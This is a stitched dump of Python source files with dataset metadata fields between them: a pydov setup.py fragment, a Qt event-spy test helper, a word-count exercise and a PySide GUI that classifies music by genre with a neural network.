requirements_vectorfile = f.read().splitlines()
setup(
name='pydov',
version='2.1.0',
description=("A Python package to download data from Databank Ondergrond "
"Vlaanderen (DOV)."),
long_description=readme,
long_description_content_type='text/markdown',
author="DOV-Vlaanderen",
author_email='dov@vlaanderen.be',
url='https://github.com/DOV-Vlaanderen/pydov',
packages=find_packages(
include=['pydov']),
include_package_data=True,
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords='pydov',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Natural Language :: Dutch',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Scientific/Engineering',
],
test_suite='tests',
tests_require=requirements_dev,
extras_require={
'docs': requirements_doc,
'devs': requirements_dev,
'vectorfile': requirements_vectorfile
}
)
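# The extras above map to optional installs, e.g. (assuming a source checkout):
#   pip install .[docs]
#   pip install .[vectorfile]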
|
mit
| 6,766,960,254,937,599,000
| 31.951613
| 78
| 0.619677
| false
| 3.847458
| false
| true
| false
|
ales-erjavec/orange-canvas
|
orangecanvas/scheme/tests/__init__.py
|
1
|
2700
|
"""
Scheme tests
"""
from AnyQt.QtCore import QObject, QEventLoop, QTimer, QCoreApplication, QEvent
from typing import List
class EventSpy(QObject):
"""
A testing utility class (similar to QSignalSpy) to record events
delivered to a QObject instance.
Note
----
Only event types can be recorded (as QEvent instances are deleted
on delivery).
Note
----
Can only be used with a QCoreApplication running.
Parameters
----------
object : QObject
An object whose events need to be recorded.
etype : Union[QEvent.Type, Sequence[QEvent.Type]
A event type (or types) that should be recorded
"""
def __init__(self, object: QObject, etype, **kwargs):
super().__init__(**kwargs)
if not isinstance(object, QObject):
raise TypeError
self.__object = object
try:
len(etype)
except TypeError:
etypes = {etype}
else:
etypes = set(etype)
self.__etypes = etypes
self.__record = []
self.__loop = QEventLoop()
self.__timer = QTimer(self, singleShot=True)
self.__timer.timeout.connect(self.__loop.quit)
self.__object.installEventFilter(self)
def wait(self, timeout=5000):
"""
Start an event loop that runs until a spied event or a timeout occurred.
Parameters
----------
timeout : int
Timeout in milliseconds.
Returns
-------
res : bool
True if the event occurred and False otherwise.
Example
-------
>>> app = QCoreApplication.instance() or QCoreApplication([])
>>> obj = QObject()
>>> spy = EventSpy(obj, QEvent.User)
>>> app.postEvent(obj, QEvent(QEvent.User))
>>> spy.wait()
True
>>> print(spy.events())
[1000]
"""
count = len(self.__record)
self.__timer.stop()
self.__timer.setInterval(timeout)
self.__timer.start()
self.__loop.exec_()
self.__timer.stop()
return len(self.__record) != count
    def eventFilter(self, receiver: QObject, event: QEvent) -> bool:
        if receiver is self.__object and event.type() in self.__etypes:
            self.__record.append(event.type())
            if self.__loop.isRunning():
                self.__loop.quit()
        return super().eventFilter(receiver, event)
def events(self) -> List[QEvent.Type]:
"""
Return a list of all (listened to) event types that occurred.
Returns
-------
events : List[QEvent.Type]
"""
return list(self.__record)
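# Minimal self-check (not part of the original module; it mirrors the doctest
# in wait() above and needs a running QCoreApplication, so run as a script):
if __name__ == "__main__":
    app = QCoreApplication.instance() or QCoreApplication([])
    obj = QObject()
    spy = EventSpy(obj, QEvent.User)
    QCoreApplication.postEvent(obj, QEvent(QEvent.User))
    assert spy.wait()
    assert spy.events() == [QEvent.User]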
|
gpl-3.0
| 5,709,660,334,887,075,000
| 26.835052
| 80
| 0.554815
| false
| 4.292528
| false
| false
| false
|
AlexMathew/csipy-exercises
|
solution/words.py
|
1
|
1277
|
import sys
def setup(words):
new_words = []
for word in words:
new_words.append(word.lower())
words = new_words
# This could have been done easier with list comprehensions.
# words = [word.lower() for word in words]
wordset = set()
wordcount = dict()
for word in words:
prev_size = len(wordset)
wordset.add(word)
new_size = len(wordset)
if new_size > prev_size:
wordcount[word] = words.count(word)
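            # NOTE: words.count(word) rescans the whole list for every new
            # word (O(n^2) overall); collections.Counter(words) would build
            # the same mapping in a single pass.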
return wordset, wordcount
def main():
if len(sys.argv) == 1 or len(sys.argv) > 2:
print 'FORMAT : python words.py --count|--set'
sys.exit(0)
# This could have been done by using exception handlers for IndexError.
option = sys.argv[1]
if option not in ['--count', '--set']:
print 'FORMAT : python words.py --count|--set'
sys.exit(0)
try:
with open('input.txt', 'r') as f:
text = f.read()
    except IOError:
        print 'Rename one of the two files there as input.txt'
        sys.exit(1)
words = text.split()
wordset, wordcount = setup(words)
if option == '--set':
content = " ".join(sorted(list(wordset)))
with open('output.txt', 'w') as f:
f.write(content)
elif option == '--count':
content = " ".join(sorted(wordcount, key=wordcount.get, reverse=True))
with open('output.txt', 'w') as f:
f.write(content)
if __name__ == '__main__':
main()
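# Example invocation (assumes an input.txt next to this script):
#   python words.py --set    -> output.txt gets the sorted unique words
#   python words.py --count  -> output.txt gets words sorted by frequency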
|
mit
| 7,769,703,426,424,290,000
| 26.782609
| 73
| 0.651527
| false
| 2.831486
| false
| false
| false
|
inf0-warri0r/music_cat
|
classifier/classifier.py
|
1
|
4355
|
#!/usr/bin/env python
"""
Author : tharindra galahena (inf0_warri0r)
Project: classifying music using a neural network
Blog : http://www.inf0warri0r.blogspot.com
Date : 23/05/2013
License:
Copyright 2013 Tharindra Galahena
This is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version. This is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with
this. If not, see http://www.gnu.org/licenses/.
"""
from PySide import QtCore, QtGui
from classify import Ui_classifier
import os
import sys
import file_read
import histograme
import thread
import neural_net
import plot
class MyWidget(QtGui.QMainWindow, Ui_classifier):
def __init__(self, parent=None):
super(MyWidget, self).__init__(parent)
self.setupUi(self)
self.file_name = ""
self.hist_u = list()
self.hist_n = list()
self.net = neural_net.neural(10, 1, 3, 15, 0.001, 0.0)
self.net.init()
self.net.put_weights(self.load())
self.img = ""
self.convert.clicked.connect(self.convert_file)
self.classify.clicked.connect(self.classify_func)
self.browse.clicked.connect(self.browse_func)
self.hist_lable.setScaledContents(True)
self.run = True
self.timer = QtCore.QTimer()
self.timer.setInterval(1000)
self.timer.timeout.connect(self.re_draw)
self.timer.start()
def browse_func(self):
fname, _ = QtGui.QFileDialog.getOpenFileName(self, 'Open file')
self.music_file.setText(str(fname))
def re_draw(self):
if not self.run:
QtGui.QMessageBox.about(self, "Done", "Done !!!")
self.run = True
return 0
def convert_file(self):
self.file_name = self.music_file.text()
if self.file_name == "":
            QtGui.QMessageBox.about(self, "ERROR", "invalid file")
return 0
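        # Fork, then replace the child process image with ffmpeg to transcode
        # the chosen file to out.aif; the parent blocks until it finishes.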
pid = os.fork()
if pid:
os.waitpid(pid, 0)
else:
os.execlp("ffmpeg", "ffmpeg", "-i",
self.file_name, "-y", "out.aif")
exit(0)
try:
thread.start_new_thread(self.thread_func, ())
except Exception:
QtGui.QMessageBox.about(self, "ERROR", "thread error")
def thread_func(self):
self.run = True
f = file_read.file_read(("out.aif", "out.aif"))
f.convert()
f.save("./")
self.image = f.image
h = histograme.histograme(f.image)
h.create_histograme()
self.hist_u = h.unnormaliced_histograme()
self.hist_n = h.normalice_histograme()
print "done"
self.run = False
def classify_func(self):
p = plot.plot(self.hist_u, 600, 400, (256, 125, 0), (256, 256, 256))
p.set_scales()
p.set_plot()
p.draw("hist.jpg")
qimage = QtGui.QImage("out.aif.jpg")
pix = QtGui.QPixmap.fromImage(qimage)
self.label.setPixmap(pix)
qimage = QtGui.QImage("hist.jpg")
pix = QtGui.QPixmap.fromImage(qimage)
self.hist_lable.setPixmap(pix)
try:
thread.start_new_thread(self.thread_func2, ())
except Exception:
QtGui.QMessageBox.about(self, "ERROR", "thread error")
def thread_func2(self):
print self.hist_n
out = self.net.update(self.hist_n)
print out
self.gener.setText("")
if out[0] < 0.5:
self.type = "Rock"
else:
self.type = "Classic"
self.gener.setText(self.type)
def load(self):
f = open('weights', 'r')
cat = f.read()
f.close()
weights = list()
lst = cat.splitlines()
for i in range(0, len(lst)):
weights.append(float(lst[i]))
return weights
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = MyWidget()
window.show()
sys.exit(app.exec_())
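# Note (inferred from load() above, not stated in the original): the `weights`
# file is expected to contain one float per line, presumably one value per
# weight of the 10-1-3-15 network constructed in MyWidget.__init__.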
|
agpl-3.0
| 809,784,179,446,759,300
| 27.279221
| 78
| 0.595867
| false
| 3.500804
| false
| false
| false
|